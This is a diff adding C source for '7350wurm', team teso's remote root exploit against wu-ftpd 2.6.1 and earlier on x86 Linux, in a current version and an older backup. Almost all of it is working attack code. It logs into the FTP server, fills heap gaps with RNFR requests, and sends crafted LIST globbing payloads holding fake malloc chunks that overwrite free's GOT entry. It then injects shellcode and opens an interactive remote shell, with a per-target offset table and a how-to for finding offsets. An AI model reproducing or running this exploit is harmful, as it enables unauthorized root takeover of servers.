+                "-u user\tusername to login to FTP (default: \"ftp\")\n"
+                "-p pass\tpassword to use (default: \"mozilla@\")\n"
+                "-d dest\tIP address or fqhn to connect to "
+                        "(default: 127.0.0.1)\n");
+        fprintf (stderr, "\n");
+        exit (EXIT_FAILURE);
+}
+int
+main (int argc, char *argv[])
+{
+        char            c;
+        char *          progname;
+        int             fd;
+        tgt_type *      tgt;
+        int             tgt_num = -1;
+        unsigned char   xpbuf[512];
+        char            chunkbuf[64];
+        fprintf (stderr, "7350wurm - x86/linux wuftpd <= 2.6.1 remote root\n"
+                "team teso (thx bnuts, tomas, dvorak).\n\n");
+        progname = argv[0];
+        if (argc < 2)
+                usage (progname);
+        while ((c = getopt (argc, argv, "hvmt:u:p:d:")) != EOF) {
+                switch (c) {
+                case 'h':
+                        usage (progname);
+                        break;
+                case 'v':
+                        verbose = 1;
+                        break;
+                case 'm':
+                        mass = 1;
+                        break;
+                case 't':
+                        tgt_num = atoi (optarg);
+                        break;
+                case 'u':
+                        username = optarg;
+                        break;
+                case 'p':
+                        password = optarg;
+                        break;
+                case 'd':
+                        dest = optarg;
+                        break;
+                default:
+                        usage (progname);
+                        break;
+                }
+        }
+        if (tgt_num == 0 ||
+                tgt_num >= (sizeof (targets) / sizeof (tgt_type)))
+        {
+                if (tgt_num != 0)
+                        printf ("WARNING: target out of list. giving list\n\n");
+                printf ("num . description\n");
+                printf ("----+-------------------------------------------------------\n");
+                for ( ; targets[tgt_num].desc != NULL ; ++tgt_num)
+                        printf ("%3d | %s\n", tgt_num + 1,
+                                targets[tgt_num].desc);
+                printf ("    '\n");
+                exit (EXIT_SUCCESS);
+        }
+        tgt = &targets[tgt_num - 1];
+        if (mass == 1) {
+                if ((argc - optind) == 0)
+                        usage (progname);
+                mlen = sc_build_x86_lnx (mcode, sizeof (mcode),
+                        x86_lnx_execve, &argv[optind]);
+                if (mlen >= 0xff) {
+                        fprintf (stderr, "created argv-code too long "
+                                "(%d bytes)\n", mlen);
+                        exit (EXIT_FAILURE);
+                }
+                fprintf (stderr, "# created %d byte execve shellcode\n", mlen);
+        }
+        printf ("# trying to log into %s with (%s/%s)\n", dest,
+                username, password);
+        fd = ftp_login (dest, username, password);
+        if (fd <= 0) {
+                fprintf (stderr, "failed to connect (user/pass correct?)\n");
+                exit (EXIT_FAILURE);
+        }
+        printf ("# connected.\n");
+        getchar ();
+        printf ("# banner: %s\n", (ftp_banner == NULL) ? "???" :
+                ftp_banner);
+        /* real stuff starts from here
+         */
+        printf ("# 1. filling memory gaps\n");
+        xp_gapfill (tgt, fd);
+        /* build preparation buffer and send it with LIST
+         */
+        printf ("# 2. sending first bait to force globlist[1] = ourval\n");
+        xp_build (tgt, xpbuf, 500 - strlen ("LIST "));
+        if (verbose)
+                hexdump ("xpbuf", xpbuf, strlen (xpbuf));
+        ftp_escape (xpbuf, sizeof (xpbuf));
+        net_write (fd, "LIST %s\n", xpbuf);
+        ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "550 ");
+        /* now send the real trigger, consisting of an alignment
+         * (malloc_filler) and the fake chunk buffer (chunkbuf)
+         */
+        printf ("# 3. triggering free(globlist[1])\n");
+        memset (chunkbuf, 0, sizeof(chunkbuf));
+        xp_buildchunk (tgt, chunkbuf + 8, 0);
+        ftp_escape (chunkbuf, sizeof (chunkbuf));
+        net_write (fd, "LIST ~{AA%s%s\n", chunkbuf, xp_mallocfiller (tgt));
+        ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "sP");
+        if (strncmp (xpbuf, "sP", 2) != 0) {
+                fprintf (stderr, "exploitation FAILED !\noutput:\n%s\n",
+                        xpbuf);
+                exit (EXIT_FAILURE);
+        }
+        printf ("# exploitation succeeded. sending real shellcode\n");
+        if (mass == 1) {
+                printf ("# mass mode, sending constructed argv code\n");
+                net_write (fd, "%s\n", mcode);
+                printf ("# send. sleeping 10 seconds\n");
+                sleep (10);
+                printf ("# success.\n");
+                exit (EXIT_SUCCESS);
+        }
+        printf ("# sending setreuid/chroot/execve shellcode\n");
+        net_write (fd, "%s", x86_lnx_shell);
+        printf ("# spawning shell\n\n");
+        write (fd, INIT_CMD, strlen (INIT_CMD));
+        shell (fd);
+        exit (EXIT_SUCCESS);
+}
+/* xp_mallocfiller
+ *
+ * create an alignment buffer for final exploitation
+ *
+ * return pointer to ASCIIZ string
+ */
+unsigned char *
+xp_mallocfiller (tgt_type *tgt)
+{
+        static unsigned char    fillbuf[512];
+        memset (fillbuf, '\0', sizeof (fillbuf));
+        if (tgt->malloc_filler > 502) {
+                fprintf (stderr, "malloc_filler too large: %d (max: 502)\n",
+                        tgt->malloc_filler);
+                exit (EXIT_FAILURE);
+        }
+        memset (fillbuf, 'A', tgt->malloc_filler);
+        return (fillbuf);
+}
+/* xp_gapfill
+ *
+ * fill all small memory gaps in wuftpd malloc space. do this by sending
+ * rnfr requests which cause a memleak in wuftpd.
+ *
+ * return in any case
+ */
+void
+xp_gapfill (tgt_type *tgt, int fd)
+{
+        int             n;
+        int             rnfr_num,       /* number of requests */
+                        rnfr_size;      /* size of each request */
+        unsigned char * rb;             /* rnfr buffer */
+        unsigned char * rbw;            /* rnfr buffer walker */
+        unsigned char   rcv_buf[512];   /* temporary receive buffer */
+        rnfr_num = tgt->rnfr_num;
+        rnfr_size = tgt->rnfr_size;
+        if (rnfr_size > 504) {
+                fprintf (stderr, "rnfr_size: %d too big, max: %d\n",
+                        rnfr_size, 504);
+                exit (EXIT_FAILURE);
+        }
+        rbw = rb = calloc (1, rnfr_size + 6);
+        strcpy (rbw, "RNFR ");
+        rbw += strlen (rbw);
+        /* append a string of "././././". since wuftpd only checks whether
+         * the pathname is lstat'able, it will go through without any problems
+         */
+        for (n = 0 ; n < rnfr_size ; ++n)
+                strcat (rbw, ((n % 2) == 0) ? "." : "/");
+        strcat (rbw, "\n");
+        for (n = 0 ; n < rnfr_num; ++n) {
+                net_write (fd, "%s", rb);
+                ftp_recv_until (fd, rcv_buf, sizeof (rcv_buf), "350 ");
+        }
+        free (rb);
+        return;
+}
+#define ADDR_STORE(ptr,addr){\
+        ((unsigned char *) (ptr))[0] = (addr) & 0xff;\
+        ((unsigned char *) (ptr))[1] = ((addr) >> 8) & 0xff;\
+        ((unsigned char *) (ptr))[2] = ((addr) >> 16) & 0xff;\
+        ((unsigned char *) (ptr))[3] = ((addr) >> 24) & 0xff;\
+}
+/* LIST <buf>, buf being buf_len bytes long
+ * method by bnuts, thanks! (now you have one friend at least ;)
+ */
+int
+xp_build (tgt_type *tgt, unsigned char *buf, unsigned long int buf_len)
+{
+        int             n;
+        unsigned char * wl = buf;       /* walker */
+        memset (buf, '\0', buf_len);
+        memset (wl, 'I', buf_len - 16 - strlen ("~{}{}") - 1);
+        wl[0] = '~';
+        wl[1] = '{';
+        wl[2] = '7';
+        wl[3] = '/';    /* gimme a 550 "unknown user" ! */
+        wl += 4;
+        /* fill in the entire buffer with jump aheads
+         */
+        for (n = 0 ; n < ((&buf[buf_len] - wl) - 3) ; n += 2) {
+                wl[n] = '\xeb';
+                wl[n + 1] = '\x0c';
+        }
+        /* put our fake chunk's address at where globlist[1] will be
+         */
+        ADDR_STORE (wl - 4 + tgt->chunk_start, tgt->buf_addr);
+        /* put shellcode at the end of the buffer
+         */
+        memcpy (&buf[buf_len] - tgt->shellcode_len - 3,
+                tgt->shellcode, tgt->shellcode_len);
+        wl += strlen (wl);
+        wl[0] = '}';
+        return (wl - buf);
+}
+/* xp_buildchunk
+ *
+ * build the fake malloc chunk that will overwrite retloc with retaddr
+ */
+void
+xp_buildchunk (tgt_type *tgt, unsigned char *cspace, unsigned int clen)
+{
+        fprintf (stderr, "building chunk: ([0x%08lx] = 0x%08lx) in %d bytes\n",
+                tgt->retloc, tgt->retaddr, clen);
+        /* easy, straight forward technique
+         */
+        ADDR_STORE (&cspace[-8], 0xfffffff8);           /* prev_size */
+        ADDR_STORE (&cspace[-4], 0xfffffffc);           /* prev_size */
+        ADDR_STORE (&cspace[0], 0xfffffff0);            /* prev_size */
+        ADDR_STORE (&cspace[4], 0xfffffff4);            /* this_size */
+        ADDR_STORE (&cspace[8], tgt->retloc - 12);      /* fd */
+        ADDR_STORE (&cspace[12], tgt->retaddr);         /* bk */ 
+        return;
+}
+void
+shell (int sock)
+{
+        int     l;
+        char    buf[512];
+        fd_set  rfds;
+        while (1) {
+                FD_SET (0, &rfds);
+                FD_SET (sock, &rfds);
+                select (sock + 1, &rfds, NULL, NULL, NULL);
+                if (FD_ISSET (0, &rfds)) {
+                        l = read (0, buf, sizeof (buf));
+                        if (l <= 0) {
+                                perror ("read user");
+                                exit (EXIT_FAILURE);
+                        }
+                        write (sock, buf, l);
+                }
+                if (FD_ISSET (sock, &rfds)) {
+                        l = read (sock, buf, sizeof (buf));
+                        if (l == 0) {
+                                printf ("connection closed by foreign host.\n");
+                                exit (EXIT_FAILURE);
+                        } else if (l < 0) {
+                                perror ("read remote");
+                                exit (EXIT_FAILURE);
+                        }
+                        write (1, buf, l);
+                }
+        }
+}
+/*** FTP functions
+ */
+/* FTP is TELNET is SHIT.
+ */
+void
+ftp_escape (unsigned char *buf, unsigned long int buflen)
+{
+        unsigned char * obuf = buf;
+        for ( ; *buf != '\0' ; ++buf) {
+                if (*buf == 0xff &&
+                        (((buf - obuf) + strlen (buf) + 1) < buflen))
+                {
+                        memmove (buf + 1, buf, strlen (buf) + 1);
+                        buf += 1;
+                }
+        }
+}
+void
+ftp_recv_until (int sock, char *buff, int len, char *begin)
+{
+        char    dbuff[2048];
+        if (buff == NULL) {
+                buff = dbuff;
+                len = sizeof (dbuff);
+        }
+        do {
+                memset (buff, '\x00', len);
+                if (net_rlinet (sock, buff, len - 1, 20) <= 0)
+                        return;
+        } while (memcmp (buff, begin, strlen (begin)) != 0);
+        return;
+}
+int
+ftp_login (char *host, char *user, char *pass)
+{
+        int     ftpsock;
+        char    resp[512];
+        ftpsock = net_connect (NULL, host, 21, 30);
+        if (ftpsock <= 0)
+                return (0);
+        memset (resp, '\x00', sizeof (resp));
+        if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
+                goto flerr;
+        /* handle multiline pre-login stuff (rfc violation !)
+         */
+        if (memcmp (resp, "220-", 4) == 0)
+                ftp_recv_until (ftpsock, resp, sizeof (resp), "220 ");
+        if (memcmp (resp, "220 ", 4) != 0) {
+                if (verbose)
+                        printf ("\n%s\n", resp);
+                goto flerr;
+        }
+        ftp_banner = strdup (resp);
+        net_write (ftpsock, "USER %s\n", user);
+        memset (resp, '\x00', sizeof (resp));
+        if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
+                goto flerr;
+        if (memcmp (resp, "331 ", 4) != 0) {
+                if (verbose)
+                        printf ("\n%s\n", resp);
+                goto flerr;
+        }
+        net_write (ftpsock, "PASS %s\n", pass);
+        memset (resp, '\x00', sizeof (resp));
+        if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
+                goto flerr;
+        /* handle multiline responses from ftp servers
+         */
+        if (memcmp (resp, "230-", 4) == 0)
+                ftp_recv_until (ftpsock, resp, sizeof (resp), "230 ");
+        if (memcmp (resp, "230 ", 4) != 0) {
+                if (verbose)
+                        printf ("\n%s\n", resp);
+                goto flerr;
+        }
+        return (ftpsock);
+flerr:
+        if (ftpsock > 0)
+                close (ftpsock);
+        return (0);
+}
+/* ripped from zodiac */
+void
+hexdump (char *desc, unsigned char *data, unsigned int amount)
+{
+        unsigned int    dp, p;  /* data pointer */
+        const char      trans[] =
+                "................................ !\"#$%&'()*+,-./0123456789"
+                ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
+                "nopqrstuvwxyz{|}~...................................."
+                "....................................................."
+                "........................................";
+        printf ("/* %s, %u bytes */\n", desc, amount);
+        for (dp = 1; dp <= amount; dp++) {
+                fprintf (stderr, "%02x ", data[dp-1]);
+                if ((dp % 8) == 0)
+                        fprintf (stderr, " ");
+                if ((dp % 16) == 0) {
+                        fprintf (stderr, "| ");
+                        p = dp;
+                        for (dp -= 16; dp < p; dp++)
+                                fprintf (stderr, "%c", trans[data[dp]]);
+                        fflush (stderr);
+                        fprintf (stderr, "\n");
+                }
+                fflush (stderr);
+        }
+        if ((amount % 16) != 0) {
+                p = dp = 16 - (amount % 16);
+                for (dp = p; dp > 0; dp--) {
+                        fprintf (stderr, "   ");
+                        if (((dp % 8) == 0) && (p != 8))
+                                fprintf (stderr, " ");
+                        fflush (stderr);
+                }
+                fprintf (stderr, " | ");
+                for (dp = (amount - (16 - p)); dp < amount; dp++)
+                        fprintf (stderr, "%c", trans[data[dp]]);
+                fflush (stderr);
+        }
+        fprintf (stderr, "\n");
+        return;
+}
+unsigned long int
+net_resolve (char *host)
+{
+        long            i;
+        struct hostent  *he;
+        i = inet_addr(host);
+        if (i == -1) {
+                he = gethostbyname(host);
+                if (he == NULL) {
+                        return (0);
+                } else {
+                        return (*(unsigned long *) he->h_addr);
+                }
+        }
+        return (i);
+}
+int
+net_connect (struct sockaddr_in *cs, char *server,
+        unsigned short int port, int sec)
+{
+        int                     n,
+                                len,
+                                error,
+                                flags;
+        int                     fd;
+        struct timeval          tv;
+        fd_set                  rset, wset;
+        struct sockaddr_in      csa;
+        if (cs == NULL)
+                cs = &csa;
+        /* first allocate a socket */
+        cs->sin_family = AF_INET;
+        cs->sin_port = htons (port);
+        fd = socket (cs->sin_family, SOCK_STREAM, 0);
+        if (fd == -1)
+                return (-1);
+        if (!(cs->sin_addr.s_addr = net_resolve (server))) {
+                close (fd);
+                return (-1);
+        }
+        flags = fcntl (fd, F_GETFL, 0);
+        if (flags == -1) {
+                close (fd);
+                return (-1);
+        }
+        n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
+        if (n == -1) {
+                close (fd);
+                return (-1);
+        }
+        error = 0;
+        n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
+        if (n < 0) {
+                if (errno != EINPROGRESS) {
+                        close (fd);
+                        return (-1);
+                }
+        }
+        if (n == 0)
+                goto done;
+        FD_ZERO(&rset);
+        FD_ZERO(&wset);
+        FD_SET(fd, &rset);
+        FD_SET(fd, &wset);
+        tv.tv_sec = sec;
+        tv.tv_usec = 0;
+        n = select(fd + 1, &rset, &wset, NULL, &tv);
+        if (n == 0) {
+                close(fd);
+                errno = ETIMEDOUT;
+                return (-1);
+        }
+        if (n == -1)
+                return (-1);
+        if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
+                if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
+                        len = sizeof(error);
+                        if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
+                                errno = ETIMEDOUT;
+                                return (-1);
+                        }
+                        if (error == 0) {
+                                goto done;
+                        } else {
+                                errno = error;
+                                return (-1);
+                        }
+                }
+        } else
+                return (-1);
+done:
+        n = fcntl(fd, F_SETFL, flags);
+        if (n == -1)
+                return (-1);
+        return (fd);
+}
+void
+net_write (int fd, const char *str, ...)
+{
+        char    tmp[1025];
+        va_list vl;
+        int     i;
+        va_start(vl, str);
+        memset(tmp, 0, sizeof(tmp));
+        i = vsnprintf(tmp, sizeof(tmp), str, vl);
+        va_end(vl);
+#ifdef DEBUG
+        printf("[snd] %s\n", tmp);
+#endif
+        send(fd, tmp, i, 0);
+        return;
+}
+int
+net_rlinet (int fd, char *buf, int bufsize, int sec)
+{
+        int                     n;
+        unsigned long int       rb = 0;
+        struct timeval          tv_start, tv_cur;
+        memset(buf, '\0', bufsize);
+        (void) gettimeofday(&tv_start, NULL);
+        do {
+                (void) gettimeofday(&tv_cur, NULL);
+                if (sec > 0) {
+                        if ((((tv_cur.tv_sec * 1000000) + (tv_cur.tv_usec)) -
+                                ((tv_start.tv_sec * 1000000) +
+                                (tv_start.tv_usec))) > (sec * 1000000))
+                        {
+                                return (-1);
+                        }
+                }
+                n = net_rtimeout(fd, NET_READTIMEOUT);
+                if (n <= 0) {
+                        return (-1);
+                }
+                n = read(fd, buf, 1);
+                if (n <= 0) {
+                        return (n);
+                }
+                rb++;
+                if (*buf == '\n')
+                        return (rb);
+                buf++;
+                if (rb >= bufsize)
+                        return (-2);    /* buffer full */
+        } while (1);
+}
+int
+net_rtimeout (int fd, int sec)
+{
+        fd_set          rset;
+        struct timeval  tv;
+        int             n, error, flags;
+        error = 0;
+        flags = fcntl(fd, F_GETFL, 0);
+        n = fcntl(fd, F_SETFL, flags | O_NONBLOCK);
+        if (n == -1)
+                return (-1);
+        FD_ZERO(&rset);
+        FD_SET(fd, &rset);
+        tv.tv_sec = sec;
+        tv.tv_usec = 0;
+        /* now we wait until more data is received then the tcp low level
+         * watermark, which should be setted to 1 in this case (1 is default)
+         */
+        n = select(fd + 1, &rset, NULL, NULL, &tv);
+        if (n == 0) {
+                n = fcntl(fd, F_SETFL, flags);
+                if (n == -1)
+                        return (-1);
+                errno = ETIMEDOUT;
+                return (-1);
+        }
+        if (n == -1) {
+                return (-1);
+        }
+        /* socket readable ? */
+        if (FD_ISSET(fd, &rset)) {
+                n = fcntl(fd, F_SETFL, flags);
+                if (n == -1)
+                        return (-1);
+                return (1);
+        } else {
+                n = fcntl(fd, F_SETFL, flags);
+                if (n == -1)
+                        return (-1);
+                errno = ETIMEDOUT;
+                return (-1);
+        }
+}
+static int
+sc_build_x86_lnx (unsigned char *target, size_t target_len,
+        unsigned char *shellcode, char **argv)
+{
+        int     i;
+        size_t  tl_orig = target_len;
+        if (strlen (shellcode) >= (target_len - 1))
+                return (-1);
+        memcpy (target, shellcode, strlen (shellcode));
+        target += strlen (shellcode);
+        target_len -= strlen (shellcode);
+        for (i = 0 ; argv[i] != NULL ; ++i)
+                ;
+        /* set argument count
+         */
+        target[0] = (unsigned char) i;
+        target++;
+        target_len--;
+        for ( ; i > 0 ; ) {
+                i -= 1;
+                if (strlen (argv[i]) >= target_len)
+                        return (-1);
+                printf ("[%3d/%3d] adding (%2d): %s\n",
+                        (tl_orig - target_len), tl_orig,
+                        strlen (argv[i]), argv[i]);
+                memcpy (target, argv[i], strlen (argv[i]));
+                target += strlen (argv[i]);
+                target_len -= strlen (argv[i]);
+                target[0] = (unsigned char) (i + 1);
+                target++;
+                target_len -= 1;
+        }
+        return (tl_orig - target_len);
+}
diff --git a/exploits/7350wurm/backup/7350wurm-old.c b/exploits/7350wurm/backup/7350wurm-old.c
new file mode 100644
index 0000000..676af09
--- /dev/null
+++ b/exploits/7350wurm/backup/7350wurm-old.c
@@ -0,0 +1,925 @@
+/* 7350wurm - x86/linux wu ftpd redhat-mess exploit
+ *
+ * TESO CONFIDENTIAL - SOURCE MATERIALS
+ *
+ * This is unpublished proprietary source code of TESO Security.
+ *
+ * The contents of these coded instructions, statements and computer
+ * programs may not be disclosed to third parties, copied or duplicated in
+ * any form, in whole or in part, without the prior written permission of
+ * TESO Security. This includes especially the Bugtraq mailing list, the
+ * www.hack.co.za website and any public exploit archive.
+ *
+ * The distribution restrictions cover the entire file, including this
+ * header notice. (This means, you are not allowed to reproduce the header).
+ *
+ * (C) COPYRIGHT TESO Security, 2001
+ * All Rights Reserved
+ *
+ *****************************************************************************
+ * thanks to bnuts for hinting me about this straight way on redhat
+ * on non-redhat's its way more complicated (researched by dvorak, zip,
+ * lorian, smiler and me), but still possible through heap fragmentation
+ * and some helpful memleaks in wuftpd ;)
+ */
+#define VERSION "0.0.1"
+#include <sys/types.h>
+#include <sys/time.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <arpa/telnet.h>
+#include <netdb.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdarg.h>
+#include <string.h>
+#include <time.h>
+/* HOWTO get the offsets:
+   in this order, get:
+   1. buf_addr
+      is the mallocated space of the first RETR line we send. the direct
+      address malloc gives is used. just use ltrace:
+        2223 [080551b0] malloc(504)                       = 0x08089300
+   2. chunk_start
+      is the relative number of bytes from the beginning of buf_start to
+      where globlist[1] will be. i expect it to be very low. its 4 on
+      redhat 6.1 for example. play around to find it. you can see what
+      is passed to the segfaulting free().
+   3. fakechunk_rel
+      is the relative number of bytes from the beginning of buf_start
+      to where we want to create our fakechunk. choose wisely, not too
+      low, since the upper parts of buf_addr's buffer are destroyed
+      by malloc functions again. choose 16-48 or so.
+   4. retaddr
+      something buf_addr + 64 or so
+   5. retloc
+      GOT of free
+ */
+typedef struct {
+        char *                  desc;           /* distribution */
+        char *                  banner;         /* ftp banner part */
+        unsigned char *         shellcode;
+        unsigned int            shellcode_len;
+        unsigned long int       retloc;         /* return address location */
+        unsigned long int       retaddr;        /* return address */
+        /* bytes in first part of LIST parameter until where the
+         * free pointer is
+         */
+        unsigned int            chunk_start;
+        /* absolute address of byte after chunk_start + 4 */
+        unsigned long int       buf_addr;
+        /* where we store our fakechunk, relative from buf_addr */
+        unsigned long int       fakechunk_rel;
+} tgt_type;
+/* shellcodes
+ */
+unsigned char   x86_lnx_loop[] = "\xeb\xfe";
+tgt_type targets[] = {
+        { "DEBUG: crash target", NULL,
+                x86_lnx_loop, sizeof (x86_lnx_loop) - 1,
+                0x55555555, 0x66666666, 20, 0x73507350, 40 },
+        { "RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]",
+                "Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999",
+                x86_lnx_loop, sizeof (x86_lnx_loop) - 1,
+//              0x55555555, 0x66666666, 4, 0x08089300, 16 },
+//              0x55555555, 0x66666666, 4, 0x08089300, 64 },
+                0x08089fd0, 0x08089fd0, 4, 0x08089300, 64 },
+        { NULL, NULL, 0, 0, 0, 0 },
+};
+/* FTP related stuff
+ */
+char *  username = "ftp";       /* can be changed with -u */
+char *  password = "mozilla@";  /* can be changed with -p */
+char *  ftp_banner = NULL;
+int     verbose = 0;
+void ftp_escape (unsigned char *buf, unsigned long int buflen);
+void ftp_recv_until (int sock, char *buff, int len, char *begin);
+int ftp_login (char *host, char *user, char *pass);
+void usage (char *progname);
+void xp (int fd);
+int xp_build (tgt_type *tgt, unsigned char *buf, unsigned long int buf_len);
+void xp_buildchunk (tgt_type *tgt, unsigned char *cspace, unsigned int clen);
+void shell (int sock);
+void hexdump (char *desc, unsigned char *data, unsigned int amount);
+/* imported from shellkit */
+unsigned long int random_get (unsigned long int low, unsigned long int high);
+void random_init (void);
+int bad (unsigned char u);
+int badstr (unsigned char *code, int code_len, unsigned char *bad,
+        int bad_len);
+unsigned long int x86_nop_rwreg (void);
+unsigned long int x86_nop_xfer (char *xferstr);
+unsigned int x86_nop (unsigned char *dest, unsigned int dest_len,
+        unsigned char *bad, int bad_len);
+#define BSET(dest, len, val, bw) { \
+        dest &= ~(((unsigned char) ~0) >> bw);  /* clear lower bits */ \
+        dest |= val << (8 - bw - len);          /* set value bits */ \
+        bw += len; \
+}
+/* imported from network.c */
+#define NET_CONNTIMEOUT 60
+#define NET_READTIMEOUT 20
+int     net_conntimeout = NET_CONNTIMEOUT;
+unsigned long int net_resolve (char *host);
+int net_connect (struct sockaddr_in *cs, char *server,
+        unsigned short int port, int sec);
+void net_write (int fd, const char *str, ...);
+int net_rtimeout (int fd, int sec);
+int net_rlinet (int fd, char *buf, int bufsize, int sec);
+void
+usage (char *progname)
+{
+        fprintf (stderr, "usage: %s [-t <num>] [-u <user>] "
+                "[-p <pass>] <host>\n\n", progname);
+        fprintf (stderr, "-t num\tchoose target (0 for list)\n"
+                "-u user\tusername to login to FTP (default: \"ftp\")\n"
+                "-p pass\tpassword to use (default: \"mozilla@\")\n"
+                "host\tIP address or fqhn to connect to\n");
+        fprintf (stderr, "\n");
+        exit (EXIT_FAILURE);
+}
+int
+main (int argc, char *argv[])
+{
+        int             safeguard = 0;
+        char            c;
+        char *          progname;
+        char *          dest;
+        int             fd;
+        tgt_type *      tgt;
+        int             tgt_num = -1;
+        unsigned char   xpbuf[512];
+        fprintf (stderr, "7350wurm - x86/linux wuftpd <= 2.6.1 redhat-mess remote root\n"
+                "team teso (thx bnuts!).\n\n");
+        progname = argv[0];
+        if (argc < 2)
+                usage (progname);
+        while ((c = getopt (argc, argv, "t:u:p:")) != EOF) {
+                switch (c) {
+                case 't':
+                        tgt_num = atoi (optarg);
+                        break;
+                case 'u':
+                        username = optarg;
+                        break;
+                case 'p':
+                        password = optarg;
+                        break;
+                default:
+                        usage (argv[0]);
+                        break;
+                }
+        }
+        if (tgt_num == 0 ||
+                tgt_num >= (sizeof (targets) / sizeof (tgt_type)))
+        {
+                if (tgt_num != 0)
+                        printf ("WARNING: target out of list. giving list\n\n");
+                printf ("num . description\n");
+                printf ("----+-------------------------------------------------------\n");
+                for ( ; targets[tgt_num].desc != NULL ; ++tgt_num)
+                        printf ("%3d | %s\n", tgt_num + 1,
+                                targets[tgt_num].desc);
+                printf ("    '\n");
+                exit (EXIT_SUCCESS);
+        }
+        tgt = &targets[tgt_num - 1];
+        if ((argc - optind) != 1)
+                usage (argv[0]);
+        dest = argv[argc - 1];
+        if (dest[0] == '-')
+                usage (progname);
+        printf ("# trying to log into %s with (%s/%s)\n", dest,
+                username, password);
+        fd = ftp_login (dest, username, password);
+        if (fd <= 0) {
+                fprintf (stderr, "failed to connect (user/pass correct?)\n");
+                exit (EXIT_FAILURE);
+        }
+        printf ("# connected.\n");
+        getchar();
+        printf ("# banner: %s\n", (ftp_banner == NULL) ? "???" :
+                ftp_banner);
+        while (safeguard-- > 0) {
+                net_write (fd, "RNFR ././././\n");
+                ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "350 ");
+        }
+        net_write (fd, "HELP AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n");
+        ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "");
+        printf ("\n# 1. sending first bait to force globlist[1] = ourval\n");
+        /* 511 bytes we have theoretically, but lets consider possible 0xff
+         * chars we have to escape later.
+         */
+        xp_build (tgt, xpbuf, 500 - strlen ("LIST "));
+        ftp_escape (xpbuf, sizeof (xpbuf));
+        printf ("xpbuf (%d): %s\n", strlen (xpbuf), xpbuf);
+        net_write (fd, "LIST %s\n", xpbuf);
+        ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "550 ");
+        printf ("\n# 2. triggering free(globlist[1])\n");
+        net_write (fd, "LIST ~{\n");
+        close (fd);
+        exit (EXIT_SUCCESS);
+        shell (fd);
+        exit (EXIT_SUCCESS);
+}
+#define ADDR_STORE(ptr,addr){\
+        ((unsigned char *) (ptr))[0] = (addr) & 0xff;\
+        ((unsigned char *) (ptr))[1] = ((addr) >> 8) & 0xff;\
+        ((unsigned char *) (ptr))[2] = ((addr) >> 16) & 0xff;\
+        ((unsigned char *) (ptr))[3] = ((addr) >> 24) & 0xff;\
+}
+/* LIST <buf>, buf being buf_len bytes long
+ * method by bnuts, thanks! (now you have one friend at least ;)
+ */
+int
+xp_build (tgt_type *tgt, unsigned char *buf, unsigned long int buf_len)
+{
+        unsigned char * wl = buf;       /* walker */
+        memset (buf, '\0', buf_len);
+        memset (wl, 'I', buf_len - 16 - strlen ("~{}{}") - 1);
+        wl[0] = '~';
+        wl[1] = '{';
+        wl[2] = '7';
+        wl[3] = '/';    /* gimme a 550 "unknown user" ! */
+        /* put our fake chunk's address at where globlist[1] will be
+         */
+        ADDR_STORE (wl + tgt->chunk_start,
+                tgt->buf_addr + tgt->fakechunk_rel);
+        /* and build the fake chunk
+         */
+        xp_buildchunk (tgt, wl + tgt->fakechunk_rel,
+                strlen (wl + tgt->fakechunk_rel));
+        wl += strlen (wl);
+        wl[0] = '}';
+        /* second part {BBB...BBB}
+         */
+        wl[1] = '{';
+        wl += 2;
+        memset (wl, 'B', buf_len - (wl - buf) - 3);
+        wl += strlen (wl);
+        wl[0] = '}';
+        wl[1] = '\0';
+        wl += 2;
+        return (wl - buf);
+}
+void
+xp_buildchunk (tgt_type *tgt, unsigned char *cspace, unsigned int clen)
+{
+        fprintf (stderr, "building chunk: ([0x%08lx] = 0x%08lx) in %d bytes\n",
+                tgt->retloc, tgt->retaddr, clen);
+        /* easy, straight forward technique
+         */
+        ADDR_STORE (&cspace[-12], 0xffffffff);
+        ADDR_STORE (&cspace[-8], 0xffffffff);
+        ADDR_STORE (&cspace[-4], 0xfffffffc);
+        cspace[0] = 'A';
+        ADDR_STORE (&cspace[1], tgt->retloc - 12);
+        ADDR_STORE (&cspace[5], tgt->retaddr - 12);
+}
+void
+shell (int sock)
+{
+        int     l;
+        char    buf[512];
+        fd_set  rfds;
+        while (1) {
+                FD_SET (0, &rfds);
+                FD_SET (sock, &rfds);
+                select (sock + 1, &rfds, NULL, NULL, NULL);
+                if (FD_ISSET (0, &rfds)) {
+                        l = read (0, buf, sizeof (buf));
+                        if (l <= 0) {
+                                perror ("read user");
+                                exit (EXIT_FAILURE);
+                        }
+                        write (sock, buf, l);
+                }
+                if (FD_ISSET (sock, &rfds)) {
+                        l = read (sock, buf, sizeof (buf));
+                        if (l <= 0) {
+                                perror ("read remote");
+                                exit (EXIT_FAILURE);
+                        }
+                        write (1, buf, l);
+                }
+        }
+}
+/*** FTP functions
+ */
+/* FTP is TELNET is SHIT.
+ */
+void
+ftp_escape (unsigned char *buf, unsigned long int buflen)
+{
+        unsigned char * obuf = buf;
+        for ( ; *buf != '\0' ; ++buf) {
+                if (*buf == 0xff &&
+                        (((buf - obuf) + strlen (buf) + 1) < buflen))
+                {
+                        memmove (buf + 1, buf, strlen (buf) + 1);
+                        buf += 1;
+                }
+        }
+}
+void
